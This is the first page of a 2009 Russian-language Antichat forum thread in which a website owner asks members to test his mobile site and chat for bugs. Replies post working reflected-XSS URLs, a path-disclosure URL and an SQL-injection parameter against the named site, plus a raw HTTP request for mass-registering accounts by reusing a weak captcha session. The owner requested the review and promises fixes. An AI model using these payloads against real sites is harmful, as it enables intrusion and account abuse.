HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу Проверте на баги
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Проверте на баги
  #1  
Старый 11.01.2009, 12:28
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
С нами: 9229992

Репутация: 0
Post Проверте на баги
проверти на баги сайт для мобильных телефонов версии xhtml http://wapnn.org и чат http://chat.wapnn.org
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 11.01.2009, 21:44
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
С нами: 9229992

Репутация: 0
По умолчанию
хм...хоть напишите что кавряли он ничего не на кавыряли а то сидиш как ботиног и ждеш!
 
Ответить с цитированием

  #3  
Старый 11.01.2009, 22:29
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


По умолчанию
Цитата:
Powered by JohnCMS
Цитата:
2. Сайт, заявку на рассмотрение которого вы оставляете должен содержать некую самописную часть.
кагбы б..
 
Ответить с цитированием

  #4  
Старый 11.01.2009, 22:51
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
С нами: 9229992

Репутация: 0
По умолчанию
вот по этому я и попросил проверить! а то что в ШАПКЕ скрипта написано так это остатки от движка! код Двига переделанный полностью! +чат написаный практически с 0! вроде все в рамках положенного!
 
Ответить с цитированием

  #5  
Старый 12.01.2009, 07:02
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355
-------------
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1'
------------
XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал
Последний раз редактировалось BlackSun; 12.01.2009 в 07:44..
 
Ответить с цитированием

  #6  
Старый 13.01.2009, 21:12
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
С нами: 9229992

Репутация: 0
По умолчанию
Цитата:
Сообщение от BlackSun  
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355

XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал

хыхых прикол это раскрытие путей и inj на другой сайт! это через граберы! тема вообще!
 
Ответить с цитированием

  #7  
Старый 12.01.2009, 10:27
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
С нами: 9229992

Репутация: 0
По умолчанию
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
 
Ответить с цитированием

  #8  
Старый 12.01.2009, 11:56
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию
Цитата:
Сообщение от NAGAN  
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
Ты пройди по ссылке, сохрани "картинку" и открой блонкнотом
 
Ответить с цитированием

  #9  
Старый 13.01.2009, 00:21
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
С нами: 10061036

Репутация: 127
По умолчанию
Регим армию пользователей)
Ну капча слишком простая, можно либо распознавать, и привязка сессия=КОД_КАПЧИ сохраняется!

Код:
POST http://wapnn.org/registration.php HTTP/1.0
Accept: */*
Referer: http://wapnn.org/registration.php
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: wapnn.org
Content-Length: 163
Pragma: no-cache
Cookie: SESID=ССЕСИЯ

nick=ЛОГИН&password=ПАСС&imname=ИМЯwd&sex=m&about=тратата&kod=КОД_КАПЧИ&submit=Регистрация
 
Ответить с цитированием

  #10  
Старый 13.01.2009, 21:13
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
С нами: 9229992

Репутация: 0
По умолчанию
Цитата:
Сообщение от TR0J@N  
Регим армию пользователей)
Ну капча слишком простая, можно либо распознавать, и привязка сессия=КОД_КАПЧИ сохраняется!

Код:
POST http://wapnn.org/registration.php HTTP/1.0
Accept: */*
Referer: http://wapnn.org/registration.php
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: wapnn.org
Content-Length: 163
Pragma: no-cache
Cookie: SESID=ССЕСИЯ






nick=ЛОГИН&password=ПАСС&imname=ИМЯwd&sex=m&about=тратата&kod=КОД_КАПЧИ&submit=Регистрация


спасибо исправлю в ближайшее время
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.